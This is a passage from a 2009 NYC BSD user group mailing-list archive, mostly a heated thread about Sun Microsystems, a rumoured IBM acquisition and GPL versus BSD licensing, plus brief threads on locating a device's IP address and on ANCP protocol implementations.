Steven Kreuzer
http://www.exit2shell.com/~skreuzer

From george at ceetonetechnology.com Wed Mar 18 17:46:22 2009
From: george at ceetonetechnology.com (George Rosamond)
Date: Wed, 18 Mar 2009 17:46:22 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To:
References:
Message-ID: <49C16BAE.5030305@ceetonetechnology.com>

Steven Kreuzer wrote:
> Interesting morning for Sun Microsystems:
>
> Today at CommunityOne in New York, Sun is announcing some Cloud-related stuff
> http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud
>
> Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g
>

On the second point, may I refer others back to the past thread? :)

IMHO, the MySQL purchase (for $1b or so) was likely a way to pump up their asset value on the books. . .

g

From pete at nomadlogic.org Wed Mar 18 19:02:53 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Wed, 18 Mar 2009 16:02:53 -0700
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To: <49C16BAE.5030305@ceetonetechnology.com>
References: <49C16BAE.5030305@ceetonetechnology.com>
Message-ID:

On 18-Mar-09, at 2:46 PM, George Rosamond wrote:

> Steven Kreuzer wrote:
>> Interesting morning for Sun Microsystems:
>>
>> Today at CommunityOne in New York, Sun is announcing some Cloud-related stuff
>> http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud
>>
>> Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g
>>
>
> On the second point, may I refer others back to the past thread?
>
> :)

funny - i just had a meeting with some sun reps. oddly enough the SE had an IBM laptop. coincidence?!? yea probably...but anyway it was fun to call the sun guys "IBM'ers" and ask them when we can start running AIX in a solaris zone :)

-p

From nonesuch at bad-apples.org Wed Mar 18 19:06:04 2009
From: nonesuch at bad-apples.org (Mark Saad)
Date: Wed, 18 Mar 2009 19:06:04 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To:
References: <49C16BAE.5030305@ceetonetechnology.com>
Message-ID: <49C17E5C.609@bad-apples.org>

I keep seeing sun staffers with Macs; the scuttlebutt said Apple would buy them out. Wonder if that was ever a real option.

Pete Wright wrote:
> On 18-Mar-09, at 2:46 PM, George Rosamond wrote:
>
>> Steven Kreuzer wrote:
>>> [...]
>>
>> On the second point, may I refer others back to the past thread?
>>
>> :)
>
> funny - i just had a meeting with some sun reps. oddly enough the SE
> had an IBM laptop. coincidence?!?
> yea probably...but anyway it was
> fun to call the sun guys "IBM'ers" and ask them when we can start
> running AIX in a solaris zone :)
>
> -p

--
]Mark Saad[ mark at bad-apples.org

() ascii ribbon campaign - against html e-mail
/\ www.asciiribbon.org - against proprietary attachments

From george at ceetonetechnology.com Wed Mar 18 19:56:40 2009
From: george at ceetonetechnology.com (George Rosamond)
Date: Wed, 18 Mar 2009 19:56:40 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To: <49C17E5C.609@bad-apples.org>
References: <49C16BAE.5030305@ceetonetechnology.com> <49C17E5C.609@bad-apples.org>
Message-ID: <49C18A38.5040701@ceetonetechnology.com>

Mark Saad wrote:
> I keep seeing sun staffers with Macs; the scuttlebutt said Apple would
> buy them out. Wonder if that was ever a real option.
>

i doubt that it was a real option. . . Apple dropped the enterprise a long while ago, and wants to maintain its grip on soho, chelsea, etc.

George

From akosela at andykosela.com Thu Mar 19 06:41:29 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Thu, 19 Mar 2009 11:41:29 +0100
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To:
References: <49C16BAE.5030305@ceetonetechnology.com>
Message-ID: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com>

Pete Wright wrote:
>
> On 18-Mar-09, at 2:46 PM, George Rosamond wrote:
>
> > Steven Kreuzer wrote:
> >> [...]
> >>
> funny - i just had a meeting with some sun reps. oddly enough the SE
> had an IBM laptop. coincidence?!?
> yea probably...but anyway it was
> fun to call the sun guys "IBM'ers" and ask them when we can start
> running AIX in a solaris zone :)

For Sun that move would be as wise as Yahoo agreeing to Microsoft's proposal...

--Andy

From carton at Ivy.NET Thu Mar 19 13:54:53 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Thu, 19 Mar 2009 13:54:53 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> (Andy Kosela's message of "Thu, 19 Mar 2009 11:41:29 +0100")
References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com>
Message-ID:

>>>>> "ak" == Andy Kosela writes:

    ak> For Sun that move would be as wise as Yahoo agreeing to
    ak> Microsoft's proposal...

lolz, yeah.

but...for example, Sun has an ``enterprise mail'' package. it's huge, like Zimbra-huge, highly scalable, had Ajax-y stuff even in the ancient 2005 release I'm still using. Nobody seems to know about it. They talk about Zimbra, Scalix, imp/horde/kolab, but not the Sun package. why?

well there are a few possible answers. maybe it's too ``hard to install'' (wtf?!), or no one is interested in a package where you get ``some'' of the source code---if we're ditching Exchange then we want ALL source under a reasonable license. And we want the source for the goddamn stable version which we are actually _running_ in production, we do not want some whacked out source for an unpatchable flakey development version which you call the ``community'' version. All three under Sun's control, and their so-called open-source stuff I've dug into (Solaris, Javur) seems to make the second two mistakes.

Have you heard about their frankengcc? It's neat, and I plan to use it.
I also find it HIGHLY offensive, though I guess people who use *BSD are required to swear loyalty to the BSD license instead of GPL so you will probably not be offended, but at least you can still understand, the software Sun has co-opted here is GPL software, so the authors of the software would probably be offended, and even as BSD advocates you may agree far enough to empathize for how the author's intent was frustrated by Sun's sneaky pedantic maneuvering:

http://cooltools.sunsource.net/gcc/

But, I don't think that's why people haven't heard of the Sun mail package. I think there is only one real reason.

It's because no one knows what it's *CALLED*! I cannot even tell you. And if I tried, someone would disagree with me and say, ``no no actually that name refers to Sun's .'' Their brokeass monkey-marketing department keeps renaming it, and combining and uncombining it with other products like some little dancing-feces puppet show. Sun also has a nameless portal/wiki/CMS package which has at least three different names so you go blind trying to figure out what is inside it and what you're downloading.

http://blogs.sun.com/portal/resource/websynergy-release-2.png

I HOPE THE DIAGRAM MAKES EVERYTHING CLEAR. Even OpenSolaris itself, something even more vile and confusing than a rename has happened---they took the existing name and REPOINTED it at something completely different, in such an arcane way that I would have to give a 5-year Sun history lesson to explain the details of the change and why they are significant and mess up everyone's conversations. It's like some Orwellian newspeak.

If IBM bought them and reduced redundancies by firing their entire marketing department, then immediately sold them to Radio Shack or something, that'd be a tremendous improvement in their chances for survival.
But yeah, the brilliant work of fresh college grads that made Sun great in the old days has already been largely squished by this new regime that insists on pandering to idiot Bank sysadmins, and it smells like there's this growing culture of laziness-as-a-virtue festering in there---like, the Tier 1 phonemonkeys in the call center seem to be running the entire company, bossing around the developers to the point they live in fear and create these assertion-riddled Fisher Price interfaces with binary config files, because they don't want anything that'll be a ``call generator''. or, maybe the Tier 1 techs are in fact taking orders from the lunchladies in the cafeteria. It's structured as one of these ``bottom up'' companies, you know, because that's how you incubate bold new ideas.

I sort of wish Google would buy them and turn them Evil. At least they'd get more work done.

``Following our assimi^Waquisition of Sun, there will be no further releases of Solaris. The community is welcome to fork the CDDL bits. Good luck re-implementing the binary parts (hint: start with the C compiler, then move on to scsi_vhci. oh did we stop giving you X source at some point? 's our right.). The good news is, we will be deploying the new private version throughout our hosted Cloud, and you can use as much Solaris CPU as you like on our machines for free! free, as in $0! isn't that fantastic? you're free! so long as you sign this simple agreement! All the GPL tools are there, too, with our improvements. However since we are not actually releasing any longer, just hosting, you will not get source for them, so sorry about that and welcome to the Future!''
From raj at brainlink.com Thu Mar 19 14:15:42 2009
From: raj at brainlink.com (Raj Goel)
Date: Thu, 19 Mar 2009 14:15:42 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To:
References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com>
Message-ID: <49C28BCE.7080806@brainlink.com>

Please don't insult dung-flinging monkeys in a dancing show -- they have some use in the universe. Sun's marketing/branding team otoh, has no real purpose, except to generate negative revenues.

And Sun sales' incompetency can leave very little to be desired -- I've found it easier/faster to buy from the Sun/eBay team, than from Sun sales.

If we could combine Apple's marketing, Sun's hardware + Solaris, and Google's halo of "trust us, we're not evil..." THAT would be a lethal combination.

--
Raj

Rajesh Goel, CISSP
cell (917) 685-7731
CTO: Brainlink International, Inc.
"IT Management and Solutions"

Miles Nordin wrote:
>>>>>> "ak" == Andy Kosela writes:
>
>     ak> For Sun that move would be as wise as Yahoo agreeing to
>     ak> Microsoft's proposal...
>
> lolz, yeah.
>
> [...]

From mspitzer at gmail.com Thu Mar 19 15:41:55 2009
From: mspitzer at gmail.com (Marc Spitzer)
Date: Thu, 19 Mar 2009 15:41:55 -0400
Subject: [nycbug-talk] 64gb usb2 stick 109
Message-ID: <8c50a3c30903191241u1e25519bp15241614cd8dddb9@mail.gmail.com>

http://www.buy.com/prod/kingston-64gb-datatraveler-150-flash-drive/q/loc/101/210199009.html

--
Freedom is nothing but a chance to be better.
Albert Camus

From akosela at andykosela.com Thu Mar 19 18:43:07 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Thu, 19 Mar 2009 23:43:07 +0100
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To:
References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com>
Message-ID: <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com>

Miles Nordin wrote:

> But yeah, the brilliant work of fresh college grads that made Sun
> great in the old days has already been largely squished by this new
> regime that insists on pandering to idiot Bank sysadmins, and it
> smells like there's this growing culture of laziness-as-a-virtue
> festering in there---like, the Tier 1 phonemonkeys in the call center
> seem to be running the entire company, bossing around the developers
> to the point they live in fear and create these assertion-riddled
> Fisher Price interfaces with binary config files, because they don't
> want anything that'll be a ``call generator''. or, maybe the Tier 1
> techs are in fact taking orders from the lunchladies in the cafeteria.
> It's structured as one of these ``bottom up'' companies, you know,
> because that's how you incubate bold new ideas.
Couldn't agree more. Sun nowadays is *definitely* not the same company as when Bill Joy was there. Even Oracle has more fresh ideas than them.

--Andy

From spork at bway.net Thu Mar 19 18:52:05 2009
From: spork at bway.net (Charles Sprickman)
Date: Thu, 19 Mar 2009 18:52:05 -0400 (EDT)
Subject: [nycbug-talk] Finding a device's IP address
Message-ID:

Perhaps a bit OT, but a general question...

You have a device on a network that you do not have physical access to. It has an IP address which may or may not be on the subnet it's actually attached to.

How do you find what IP is configured? What magic ARP stuff can you spew in its direction that would perhaps make it respond with something that would give away its IP?

Thanks,

Charles

From pete at nomadlogic.org Thu Mar 19 19:23:18 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Thu, 19 Mar 2009 16:23:18 -0700
Subject: [nycbug-talk] Finding a device's IP address
In-Reply-To:
References:
Message-ID: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org>

On 19-Mar-09, at 3:52 PM, Charles Sprickman wrote:

> Perhaps a bit OT, but a general question...
>
> You have a device on a network that you do not have physical access to.
> It has an IP address which may or may not be on the subnet it's actually
> attached to.
>
> How do you find what IP is configured? What magic ARP stuff can you spew
> in its direction that would perhaps make it respond with something that
> would give away its IP?

in the past when i've been in this pickle i logged into a switch i suspected was close to the host in question. found its entry in the arp cache (which was associated w/another switch). connected to that switch, washed hands, repeated until i found the subnet that the box was on (in this case our IBM nodes all had a similar range of mac addy's which was sufficiently different than our foundry switches which made things easier).
there's even a fun diagram i found online:
http://www.networkblueprints.com/troubleshooting/using-mac-address-table-and-arp-cache-lan

HTH
-p

From spork at bway.net Thu Mar 19 19:41:26 2009
From: spork at bway.net (Charles Sprickman)
Date: Thu, 19 Mar 2009 19:41:26 -0400 (EDT)
Subject: [nycbug-talk] Finding a device's IP address
In-Reply-To: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org>
References: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org>
Message-ID:

On Thu, 19 Mar 2009, Pete Wright wrote:

> On 19-Mar-09, at 3:52 PM, Charles Sprickman wrote:
>
>> Perhaps a bit OT, but a general question...
>>
>> You have a device on a network that you do not have physical access to.
>> It has an IP address which may or may not be on the subnet it's actually
>> attached to.
>>
>> How do you find what IP is configured? What magic ARP stuff can you spew
>> in its direction that would perhaps make it respond with something that
>> would give away its IP?
>
> in the past when i've been in this pickle i logged into a switch i suspected
> was close to the host in question. found its entry in the arp cache (which
> was associated w/another switch). connected to that switch, washed hands,
> repeated until i found the subnet that the box was on (in this case our IBM
> nodes all had a similar range of mac addy's which was sufficiently different
> than our foundry switches which made things easier).

That's near where I started. I'm thinking that perhaps the switch is a bit wonky, because I've looked at the "port address table" on this HP switch and it just comes up empty, which is annoying:

    ===========================- TELNET - MANAGER MODE
    Status and Counters - Port Address Table - Port 11

      MAC Address
      -------------

Nice, huh?

> there's even a fun diagram i found online:
> http://www.networkblueprints.com/troubleshooting/using-mac-address-table-and-arp-cache-lan

Thanks for the pointers...
Charles

> HTH
> -p

From robin.polak at gmail.com Thu Mar 19 20:30:18 2009
From: robin.polak at gmail.com (Robin Polak)
Date: Thu, 19 Mar 2009 20:30:18 -0400
Subject: [nycbug-talk] Finding a device's IP address
In-Reply-To:
References: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org>
Message-ID: <551868240903191730o2898ac88rb48f57db5feee13@mail.gmail.com>

You could try running arpwatch on a machine in the vlan and identify it that way.

On 3/19/09, Charles Sprickman wrote:
> On Thu, 19 Mar 2009, Pete Wright wrote:
> [...]

--
Robin Polak
E-Mail: robin.polak at gmail.com
V. 917-494-2080

From mspitzer at gmail.com Thu Mar 19 21:12:03 2009
From: mspitzer at gmail.com (Marc Spitzer)
Date: Thu, 19 Mar 2009 21:12:03 -0400
Subject: [nycbug-talk] Finding a device's IP address
In-Reply-To:
References:
Message-ID: <8c50a3c30903191812m2325e3fdm47a9465c4b67694a@mail.gmail.com>

On Thu, Mar 19, 2009 at 6:52 PM, Charles Sprickman wrote:
> Perhaps a bit OT, but a general question...
>
> You have a device on a network that you do not have physical access to.
> It has an IP address which may or may not be on the subnet it's actually
> attached to.
>
> How do you find what IP is configured? What magic ARP stuff can you spew
> in its direction that would perhaps make it respond with something that
> would give away its IP?
>

1: show arp on the router, even if it is misconfigured, ie wrong subnet, the ip should still be in the arp table
2: broadcast ping, ie ping 255.255.255.255 and then run arp before everything times out. or capture w/tcpdump and look at later

marc

--
Freedom is nothing but a chance to be better.
Albert Camus

From lego at therac25.net Fri Mar 20 03:54:31 2009
From: lego at therac25.net (Andy Michaels)
Date: Fri, 20 Mar 2009 03:54:31 -0400
Subject: [nycbug-talk] GSMP or ANCP implementation on *BSD
Message-ID: <47f344f40903200054y44b8f3fem816082fa0add0606@mail.gmail.com>

Hello list,

I've been doing some work with ANCP lately and have not found any available reference implementations for either client or server. Neither of these protocols seems to have become so widespread yet. Is anyone aware of any activity in these areas?

I'm currently creating a very minimal ANCP server in TCL so I can test proprietary client implementations. It would be great to *not* have to buy a router to test out these implementations.
Thanks!

-Andy

From skreuzer at exit2shell.com Fri Mar 20 10:48:15 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Fri, 20 Mar 2009 10:48:15 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To: <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com>
References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com>
Message-ID: <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com>

On Mar 19, 2009, at 6:43 PM, Andy Kosela wrote:

> Miles Nordin wrote:
>
>> But yeah, the brilliant work of fresh college grads that made Sun
>> great in the old days has already been largely squished by this new
>> regime that insists on pandering to idiot Bank sysadmins, and it
>> smells like there's this growing culture of laziness-as-a-virtue
>> festering in there---like, the Tier 1 phonemonkeys in the call center
>> seem to be running the entire company, bossing around the developers
>> to the point they live in fear and create these assertion-riddled
>> Fisher Price interfaces with binary config files, because they don't
>> want anything that'll be a ``call generator''. or, maybe the Tier 1
>> techs are in fact taking orders from the lunchladies in the cafeteria.
>> It's structured as one of these ``bottom up'' companies, you know,
>> because that's how you incubate bold new ideas.
>
> Couldn't agree more. Sun nowadays is *definitely* not the same company
> as when Bill Joy was there. Even Oracle has more fresh ideas than
> them.

You are aware that Sun is the company behind ZFS, DTrace and Niagara right?
--
Steven Kreuzer
http://www.exit2shell.com/~skreuzer

From skreuzer at exit2shell.com Fri Mar 20 10:54:56 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Fri, 20 Mar 2009 10:54:56 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To:
References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com>
Message-ID: <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com>

On Mar 19, 2009, at 1:54 PM, Miles Nordin wrote:

> Have you heard about their frankengcc? It's neat, and I plan to use
> it. I also find it HIGHLY offensive, though I guess people who use
> *BSD are required to swear loyalty to the BSD license instead of GPL
> so you will probably not be offended, but at least you can still
> understand, the software Sun has co-opted here is GPL software, so the
> authors of the software would probably be offended, and even as BSD
> advocates you may agree far enough to empathize for how the author's
> intent was frustrated by Sun's sneaky pedantic maneuvering:
>
> http://cooltools.sunsource.net/gcc/

Blame the FSF for Sun having to fork gcc. Unless you are willing to sign over the copyright to any code you want to submit to any GNU project, they will not accept any patches from you.

It makes sense that sun would want to have extensions in gcc for optimizing under SPARC. This way you can have a single build infrastructure and target any architecture.
--
Steven Kreuzer
http://www.exit2shell.com/~skreuzer

From carton at Ivy.NET Fri Mar 20 11:04:53 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Fri, 20 Mar 2009 11:04:53 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To: <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> (Steven Kreuzer's message of "Fri, 20 Mar 2009 10:54:56 -0400")
References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com>
Message-ID:

>>>>> "sk" == Steven Kreuzer writes:

    >> http://cooltools.sunsource.net/gcc/

    sk> Blame the FSF for Sun having to fork gcc.

reread what I wrote. I am not complaining about the fork. I'm complaining about their sneaky way of bolting a proprietary piece onto gcc, subverting the authors' reasonable wishes through tricky legal technicalities.

    sk> It makes sense that sun would want

oh, well nevermind then. as long as it makes sense that it would be in their interest, then it's wrong for me to complain about it. wtf?!

From pete at nomadlogic.org Fri Mar 20 12:22:11 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Fri, 20 Mar 2009 09:22:11 -0700
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To:
References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com>
Message-ID: <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org>

On 20-Mar-09, at 8:04 AM, Miles Nordin wrote:

>>>>>> "sk" == Steven Kreuzer writes:
>
>>> http://cooltools.sunsource.net/gcc/
>
> sk> It makes sense that sun would want
>
> oh, well nevermind then. as long as it makes sense that it would be
> in their interest, then it's wrong for me to complain about it. wtf?!

isn't that what freedom is all about though.
being allowed to do something that serves your best interests? or is freedom more like friendly fascism where you can't be trusted to act in a responsible manner *and* look out for your best interests because someone else has already decided what's better for the collective whole...oh god, back to uni. ethics...:) -pete From carton at Ivy.NET Fri Mar 20 14:29:35 2009 From: carton at Ivy.NET (Miles Nordin) Date: Fri, 20 Mar 2009 14:29:35 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: Pete Wright's message of "Fri, 20 Mar 2009 09:22:11 -0700" References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> Message-ID: >>>>> "pw" == Pete Wright writes: >>>>> "sk" == Steven Kreuzer writes: sk> You are aware that Sun is the company behind ZFS, DTrace and sk> Niagara right? I question Niagara on your list above, because it is excellent as a software developer's trick, to look at the big picture and realize they could create something competitive within their meager research envelope, by taking advantage of their key asset: a working, ancient CPU design with a minuscule gate count that still has first-rate modern compilers and JREs targeting it. But as far as the pinnacle of CPU design the thing is pathetic. It's like (Ultra 10) * 32 + integrated northbridge. It's like some crap Cyrix/Via would come out with to compete with Intel. POWER is AIUI actually a modern design competitive with Itanium, or with whatever CPU is secretly powering the cheap x86 stuff everyone uses (whatever comes after the x86->[mysterycpu] translator blob).
But the other buzzwords on your list are pretty solid basic infrastructure, yes, and it seems like there is not so much prominent funded work on basic infrastructure since post-free-software everyone makes money on these little one-off contract jobs, bending existing crap to rather boring day-to-day requirements. Also the scheduler/contract mechanism in Solaris looks like it might be pretty good. And, I haven't used mdb, but I've the impression it's pretty good. They also made some good purchases, like Lustre and VirtualBox. Hopefully they will not be infected with Sunculture. I've high hopes for Lustre though I don't know if they are still actually doing work at an enthusiastic pace post-purchase, or if they are like coding for an hour a day and spending the rest of the time arguing on dumb mailing lists or playing fussball. VirtualBox is awesome, and those guys are definitely still hard at work post-purchase. IBM's basic software research is, maybe, similarly impressive, but it's not really cooperating with the free software community so we never see it, and I'm not sure things like LPAR and their weird AS/400 CPUs optimized for running dynamically-typed languages have a better chance of ultimate survival than Sun has. so, yeah, I guess, I agree Sun is one of the last hopes for large and genuinely creative new funded projects. but Sun culture is still kinda fucked. pw> isn't that what freedom is all about though. being allowed to pw> do something that serves your best interests? are you oversimplifying things? maybe just a _little_? yeah, I sort of baited you because I've seen this argument play out wrongly too many times already. pw> friendly fascism where you can't be trusted to act in a pw> responsible manner *and* look out for your best interests where was ``act in a responsible manner'' in your last statement? simplified right out, I think. Personally I find ``trusted to act in a responsible manner'' a bit paternalistic and authoritarian.
I do not think my rights and freedoms come from someone more powerful ``trust''ing me not to abuse them. But that shouldn't mean I can't apply pressure to someone who I see making a mess. They can ignore me for a while, until too many people say ``hey, knock it off,'' and at that point if the complainers prevail I think we're generally happy. This is called democracy. It's rather expensive to operate and doesn't function with perfect fairness and is sometimes frustratingly deferential to mediocrity, but it keeps us out from under the thumbs of petty smug arrogant simple-minded autocrats like yourself: When your argument starts with what you imagine are first principles and ends with a hierarchy of incontrovertible authoritarian force, this is no longer a democratic social structure, and the fact so many supposed citizens of the Free World find such structures mysteriously appealing frightens me. I see that Sun is disrespecting the reasonable way with which certain authors to whom I feel solidarity wish to use their copyright. Can I or can I not attack the reputation of the one doing this? I'd like to, because they are _trading_ on that reputation in a big way so I have some hope of success, and attacking it serves my interest. But according to people like you, I am not allowed to push back because they are ``acting in their interest,'' and whenever someone big and rich is acting in their own interest the almighty godlike Invisible Hand is at work, and we'd better all just stay the fuck back and let it work its greedy magic, because THAT is the *core of freedom* and if we did anything else we'd be like Soviet Russia. well, bullSHIT. Where the hell is MY best interest in your world-view? In any case, I can complain about whatever I like. But as I predicted, broke-ass BSD-club pseudoethics tries to stop me at step zero. wake UP, goddamnit. your tiny little libertarian REICH is on fire. YHBT. YHL. HAND.
From pete at nomadlogic.org Fri Mar 20 14:46:47 2009 From: pete at nomadlogic.org (Pete Wright) Date: Fri, 20 Mar 2009 11:46:47 -0700 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> Message-ID: <39FB0D56-9C3E-48C5-9D27-F014FBE45D95@nomadlogic.org> On 20-Mar-09, at 11:29 AM, Miles Nordin wrote: >>>>>> "pw" == Pete Wright writes: >>>>>> > > pw> friendly fascism where you can't be trusted to act in a > pw> responsible manner *and* look out for your best interests > > where was ``act in a responsible manner'' in your last statement? > simplified right out, I think. > wow - sorry didn't mean to feed the troll...didn't know he was so hungry... > Personally I find ``trusted to act in a responsible manner'' a bit > paternalistic and authoritarian. I do not think my rights and > freedoms come from someone more powerful ``trust''ing me not to abuse > them. But that shouldn't mean I can't apply pressure to someone who I > see making a mess. They can ignore me for a while, until too many > people say ``hey, knock it off,'' and at that point if the complainers > prevail I think we're generally happy. This is called democracy.
> It's rather expensive to operate and doesn't function with perfect > fairness and is sometimes frustratingly deferential to mediocrity, but > it keeps us out from under the thumbs of petty smug arrogant > simple-minded autocrats like yourself: When your argument starts with > what you imagine are first principles and ends with a hierarchy of > incontrovertible authoritarian force, this is no longer a democratic > social structure, and the fact so many supposed citizens of the Free > World find such structures mysteriously appealing frightens me. > > I see that Sun is disrespecting the reasonable way with which certain > authors to whom I feel solidarity wish to use their copyright. Can I > or can I not attack the reputation of the one doing this? I'd like > to, because they are _trading_ on that reputation in a big way so I > have some hope of success, and attacking it serves my interest. > > But according to people like you, I am not allowed to push back > because they are ``acting in their interest,'' and whenever someone > big and rich is acting in their own interest the almighty godlike > Invisible Hand is at work, and we'd better all just stay the fuck back > and let it work its greedy magic, because THAT is the *core of > freedom* and if we did anything else we'd be like Soviet Russia. > > well, bullSHIT. > > Where the hell is MY best interest in your world-view? > > In any case, I can complain about whatever I like. > > But as I predicted, broke-ass BSD-club pseudoethics tries to stop me > at step zero. wake UP, goddamnit. your tiny little libertarian REICH > is on fire. > > YHBT. YHL. HAND. > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk
From carton at Ivy.NET Fri Mar 20 16:19:04 2009 From: carton at Ivy.NET (Miles Nordin) Date: Fri, 20 Mar 2009 16:19:04 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <39FB0D56-9C3E-48C5-9D27-F014FBE45D95@nomadlogic.org> (Pete Wright's message of "Fri, 20 Mar 2009 11:46:47 -0700") References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <39FB0D56-9C3E-48C5-9D27-F014FBE45D95@nomadlogic.org> Message-ID: >>>>> "pw" == Pete Wright writes: pw> didn't mean to feed the troll... like i said... YHBT. YHL. HAND. From mspitzer at gmail.com Fri Mar 20 22:44:42 2009 From: mspitzer at gmail.com (Marc Spitzer) Date: Fri, 20 Mar 2009 22:44:42 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> Message-ID: <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> 2009/3/20 Miles Nordin : > > I see that Sun is disrespecting the reasonable way with which certain > authors to whom I feel solidarity wish to use their copyright. Can I > or can I not attack the reputation of the one doing this? I'd like > to, because they are _trading_ on that reputation in a big way so I > have some hope of success, and attacking it serves my interest. > But is not the GNU/FSF also doing/has done exactly what you are complaining that Sun did to GNU?
Was not most of the original GNU products rebranded BSD, and BSD licensed, tools? Flex and Bison come to mind, I also think that early GCC was also based on BSD PCC (I could be wrong here). There is no real way to argue that GPLing a BSD project is not a violation of the authors' intent. And while we are on the subject of marketing does not the FSF heavily and massively misrepresent the word free in their message? GPL cannot be free as the word is defined in the dictionary, as it contradicts the definition of free in any English dictionary I have read. It seems like sauce for the goose is sauce for the gander. later, marc -- Freedom is nothing but a chance to be better. Albert Camus From akosela at andykosela.com Sat Mar 21 07:43:11 2009 From: akosela at andykosela.com (Andy Kosela) Date: Sat, 21 Mar 2009 12:43:11 +0100 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> Message-ID: <49c4d2cf.0eFpGM4hlcQb99Yq%akosela@andykosela.com> Steven Kreuzer wrote: > > On Mar 19, 2009, at 6:43 PM, Andy Kosela wrote: > > > Miles Nordin wrote: > > > >> But yeah, the brilliant work of fresh college grads that made Sun > >> great in the old days has already been largely squished by this new > >> regime that insists on pandering to idiot Bank sysadmins, and it > >> smells like there's this growing culture of laziness-as-a-virtue > >> festering in there---like, the Tier 1 phonemonkeys in the call center > >> seem to be running the entire company, bossing around the developers > >> to the point they live in fear and create these assertion-riddled > >> Fisher Price 